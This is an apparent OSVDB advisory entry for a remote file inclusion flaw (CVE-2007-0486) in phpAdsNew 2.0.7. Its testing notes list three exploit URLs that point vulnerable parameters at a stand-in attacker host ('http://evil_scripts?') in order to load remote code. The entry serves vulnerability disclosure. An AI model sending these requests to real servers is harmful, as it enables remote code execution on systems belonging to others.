phpAdsNew Multiple Script Remote File Inclusion

2007-01-21T00:24:28
ID OSVDB:33573
Type osvdb
Reporter OSVDB
Modified 2007-01-21T00:24:28

Description

Manual Testing Notes

/phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=http://evil_scripts?

/phpAdsNew-2.0.7/admin/report-index?filename=http://evil_scripts?

/phpAdsNew-2.0.7/admin/lib-gui.inc?$phpAds_config['my_footer']=http://evil_scripts?

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0556.html

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0517.html

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0487.html

CVE-2007-0486